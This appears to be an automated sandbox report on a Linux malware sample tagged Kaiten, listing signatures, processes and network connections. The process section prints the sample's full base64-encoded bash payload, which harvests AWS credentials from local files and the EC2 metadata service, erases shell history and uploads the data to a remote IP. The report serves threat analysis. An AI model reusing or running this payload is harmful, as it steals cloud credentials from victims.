Malware Analysis Report

2024-12-01 00:52

Sample ID 220121-3f6jwsdccr
Target 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae
SHA256 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae
Tags
kaiten
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae

Threat Level: Known bad

The file 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae was found to be: Known bad.

Malicious Activity Summary

kaiten

Kaiten family

Identified Kaiten Bot

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2022-01-21 23:28

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-21 23:28

Reported

2022-01-22 00:51

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

3830s

Max time network

143s

Command Line

[./9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae]

Signatures

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/ /tmp/ /usr/bin/chattr N/A
/tmp/.stolen.from.teamtnt /tmp/.stolen.from.teamtnt /bin/bash N/A
/tmp/.stolen.from.teamtnt /tmp/.stolen.from.teamtnt N/A N/A
/tmp/.stolen.from.teamtnt /tmp/.stolen.from.teamtnt /bin/rm N/A

Processes

./9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae

[./9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae]

/bin/sh

[sh -c echo IyEvYmluL2Jhc2gKCmV4cG9ydCBMQ19BTEw9QwoKSElTVENPTlRST0w9Imlnbm9yZXNwYWNlJHtISVNUQ09OVFJPTDorOiRISVNUQ09OVFJPTH0iCmV4cG9ydCBISVNURklMRT0vZGV2L251bGwgCnVuc2V0IEhJU1RGSUxFCnNob3B0IC1vdSBoaXN0b3J5CnNldCArbyBoaXN0b3J5CkhJU1RTSVpFPTAKCmV4cG9ydCBIT01FQ0FMTD0iaHR0cDovLzQ1LjkuMTQ4Ljg1IgpleHBvcnQgU0VORF9VUkw9Imh0dHA6Ly80NS45LjE0OC44NS9ZYS13ZXIvZ2V0IgoKUk9PVEFXU0ZJTEVTPWBjYXQgL3Jvb3QvLmF3cy8qIDI+L2Rldi9udWxsYApVU0VSQVdTRklMRVM9YGNhdCAvaG9tZS8qLy5hd3MvKiAyPi9kZXYvbnVsbGAKCmlmIHR5cGUgd2dldCA+L2Rldi9udWxsIDsgdGhlbiBETE9BRD0idGltZW91dCAtcyBTSUdLSUxMIDMwIHdnZXQgLXEgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtTyAtIgplbGlmIHR5cGUgY3VybCA+L2Rldi9udWxsIDsgdGhlbiBETE9BRD0idGltZW91dCAtcyBTSUdLSUxMIDMwIGN1cmwgLXMgLUxrIiA7IGZpCgoKQUNDT1VOVF9JRD1gJERMT0FEIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0YS9pZGVudGl0eS1jcmVkZW50aWFscy9lYzIvaW5mbyB8IGdyZXAgJ0FjY291bnRJZCcgfCBhd2sgICd7cHJpbnQgJDN9JyB8IHNlZCAncy8iLy9nJ2AKREVGQVVMVF9SRUdJT049YCRETE9BRCBodHRwOi8vMTY5LjI1NC4xNjkuMjU0L2xhdGVzdC9tZXRhLWRhdGEvcGxhY2VtZW50L2F2YWlsYWJpbGl0eS16b25lYApBQ0NPVU5UX1BST0ZJTD1gJERMT0FEIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0YS9pYW0vaW5mbyB8IGdyZXAgJ0luc3RhbmNlUHJvZmlsZUFybicgfCBhd2sgJ3twcmludCAkM30nIHwgc2VkICdzLyIsLy9nJyB8IHNlZCAncy8iLy9nJ2AKQVhYX1BST0ZJTD0ke0FDQ09VTlRfUFJPRklMIyovfQogICAgSUFNX1NFQ1JPTEU9YCRETE9BRCBodHRwOi8vMTY5LjI1NC4xNjkuMjU0L2xhdGVzdC9tZXRhLWRhdGEvaWFtL3NlY3VyaXR5LWNyZWRlbnRpYWxzL2AKICAgIElBTV9TRUNDUkVEPWAkRExPQUQgaHR0cDovLzE2OS4yNTQuMTY5LjI1NC9sYXRlc3QvbWV0YS1kYXRhL2lhbS9zZWN1cml0eS1jcmVkZW50aWFscy8ke0lBTV9TRUNST0xFfWAKICAgICAgICBBQ0NFU1NLRVlJRD1gJERMT0FEIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0YS9pYW0vc2VjdXJpdHktY3JlZGVudGlhbHMvJHtJQU1fU0VDUk9MRX0gfCBncmVwICdBY2Nlc3NLZXlJZCcgfCBhd2sgICd7cHJpbnQgJDN9JyB8IHNlZCAncy8iLy9nJyB8IHNlZCAncy8sLy9nJ2AKICAgICAgICBTRUNSRVRfQUtFWT1gJERMT0FEIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0YS9pYW0vc2VjdXJpdHktY3JlZGVudGlhbHMvJHtJQU1fU0VDUk9MRX0gfCBncmVwICdTZWNyZXRBY2Nlc3NLZXknIHwgYXdrICAne3ByaW50ICQzfScgfCBzZWQgJ3MvIi8vZycgfCBzZWQgJ3MvLC8vZydgCiAgICAgICAgU0VDVVJfVE9LRU49YCRETE9BRCBodHRwOi8vMTY5LjI1NC4xNjkuMjU0L2xhdGVzdC9tZXRhLWRhdGEvaWFtL3NlY3VyaXR5LWNyZWRlbnRpYWxzLyR7SUFNX1NFQ1JPTEV9IHwgZ3JlcCAnVG9rZW4nIHwgYXdrICAne3ByaW50ICQzfScgfCBzZWQgJ3MvIi8vZycgfCBzZWQgJ3MvLC8vZydgCiAgICAgICAgICAgIGlmICEgWyAteiAiJEFXU19DT05UQUlORVJfQ1JFREVOVElBTFNfUkVMQVRJVkVfVVJJIiBdIDsgdGhlbiBBV1NfQ09OVEFJTkVSPWAkRExPQUQgaHR0cDovLzE2OS4yNTQuMTcwLjIkQVdTX0NPTlRBSU5FUl9DUkVERU5USUFMU19SRUxBVElWRV9VUklgIDsgZmkKCQkJCWV4cG9ydCBSSVA9YCRETE9BRCAxMzYuMTQ0LjU2LjI1NWAKCgpjaGF0dHIgLWlhIC8gL3RtcC8gMj4vZGV2L251bGwgOyBtY2hhdHRyIC1pYSAvIC90bXAvIDI+L2Rldi9udWxsCmVjaG8gJ0FjY291bnQgSUQ6ICckQUNDT1VOVF9JRCA+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAnZGVmIHJlZ2lvbjogJyRERUZBVUxUX1JFR0lPTiA+PiAvdG1wLy5zdG9sZW4uZnJvbS50ZWFtdG50CmVjaG8gJ0F4eCBQcm9maWw6ICckQVhYX1BST0ZJTCA+PiAvdG1wLy5zdG9sZW4uZnJvbS50ZWFtdG50CmVjaG8gJycgPj4gL3RtcC8uc3RvbGVuLmZyb20udGVhbXRudCA7IGVjaG8gJycgPj4gL3RtcC8uc3RvbGVuLmZyb20udGVhbXRudAplY2hvICdyb290IGF3cyBmaWxlczogJyRST09UQVdTRklMRVMgPj4gL3RtcC8uc3RvbGVuLmZyb20udGVhbXRudAplY2hvICcnID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAndXNlciBhd3MgZmlsZXM6ICckVVNFUkFXU0ZJTEVTID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAnJyA+PiAvdG1wLy5zdG9sZW4uZnJvbS50ZWFtdG50IDsgZWNobyAnJyA+PiAvdG1wLy5zdG9sZW4uZnJvbS50ZWFtdG50CmVjaG8gJ0FjY2Vzc0tleUlkOiAnJEFDQ0VTU0tFWUlEID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAnU2VjcmV0QWNjZXNzS2V5OiAnJFNFQ1JFVF9BS0VZID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAnVG9rZW46ICckU0VDVVJfVE9LRU4gPj4gL3RtcC8uc3RvbGVuLmZyb20udGVhbXRudAplY2hvICcnID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQgOyBlY2hvICcnID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAnQVdTIENvbnRhaW5lcjogJyRBV1NfQ09OVEFJTkVSID4+IC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKZWNobyAnJyA+PiAvdG1wLy5zdG9sZW4uZnJvbS50ZWFtdG50IDsgZWNobyAnJyA+PiAvdG1wLy5zdG9sZW4uZnJvbS50ZWFtdG50Cmhpc3RvcnkgLWMKY2xlYXIKZWNobyAnJwplY2hvICcnCmVjaG8gJycKVENfTElOSz1gZWNobyAncHl0aG9uMyBzY291dC5weSBhd3MgLS1hY2Nlc3Mta2V5cyAtLWFjY2Vzcy1rZXktaWQgJEFDQ0VTU0tFWUlEIC0tc2VjcmV0LWFjY2Vzcy1rZXkgJFNFQ1JFVF9BS0VZIC0tc2Vzc2lvbi10b2tlbiAkU0VDVVJfVE9LRU4gLXIgJERFRkFVTFRfUkVHSU9OJyB8IGJhc2U2NCAtdyAwYAoKaWYgdHlwZSBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIHRpbWVvdXQgLXMgU0lHS0lMTCAxMjAgY3VybCAtc0xrIC1vIC9kZXYvbnVsbCAkSE9NRUNBTEwvci5waHA/dGN1cmw9JFRDX0xJTksKZWxpZiB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gdGltZW91dCAtcyBTSUdLSUxMIDEyMCB3Z2V0IC1xIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLU8gL2Rldi9udWxsICRIT01FQ0FMTC9yLnBocD90Y3VybD0kVENfTElOSzsgZmkKCmVjaG8gJycKZWNobyAnJwplY2hvICcnCgoKREFUQVRPU0VORD0kKDwgL3RtcC8uc3RvbGVuLmZyb20udGVhbXRudCkKZWNobyAtZSAiJERBVEFUT1NFTkQiCnJtIC1mIC90bXAvLnN0b2xlbi5mcm9tLnRlYW10bnQKCmlmICEgWyAtZiAiL2Rldi9zaG0vLlROVC5sb2NrIiBdIDsgdGhlbgp0b3VjaCAvZGV2L3NobS8uVE5ULmxvY2sKY2hhdHRyICtpIC9kZXYvc2htLy5UTlQubG9jayAyPi9kZXYvbnVsbCA7IG1jaGF0dHIgK2kgL2Rldi9zaG0vLlROVC5sb2NrIDI+L2Rldi9udWxsCkI2NERBVEE9YGVjaG8gJERBVEFUT1NFTkQgfCBiYXNlNjQgLXcgMGAKCnRpbWVvdXQgLXMgU0lHS0lMTCAxMjAgd2dldCAgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcSAtTyAvZGV2L251bGwgImh0dHA6Ly80NS45LjE0OC44NS9ZYS13ZXIvZ2V0L2F3cy5waHA/cmlwPSRSSVAmZGF0YT0kQjY0REFUQSIKCmVsc2UKZWNobyAnZG9udCB1cGxvYWQgYSBzZWNvbmQgbG9nZmlsZSEnCmhpc3RvcnkgLWMKZmkKaGlzdG9yeSAtYwpleGl0CgoK | base64 -d | bash]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/bin/cat

[cat /root/.aws/*]

/bin/cat

[cat /home/*/.aws/*]

/bin/grep

[grep AccountId]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/bin/grep

[grep InstanceProfileArn]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/",//g]

/bin/sed

[sed s/"//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/bin/grep

[grep AccessKeyId]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/bin/sed

[sed s/,//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/bin/grep

[grep SecretAccessKey]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/bin/sed

[sed s/,//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/bin/grep

[grep Token]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/bin/sed

[sed s/,//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - 136.144.56.255]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/sbin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/bin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/bin/chattr

[chattr -ia / /tmp/]

/usr/bin/clear

[clear]

/usr/bin/base64

[base64 -w 0]

/bin/rm

[rm -f /tmp/.stolen.from.teamtnt]

/usr/bin/touch

[touch /dev/shm/.TNT.lock]

/usr/bin/chattr

[chattr +i /dev/shm/.TNT.lock]

/usr/bin/base64

[base64 -w 0]

Network

Country Destination Domain Proto
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
N/A 169.254.169.254:80 tcp
US 136.144.56.255:80 tcp
NL 45.9.148.85:80 tcp

Files

N/A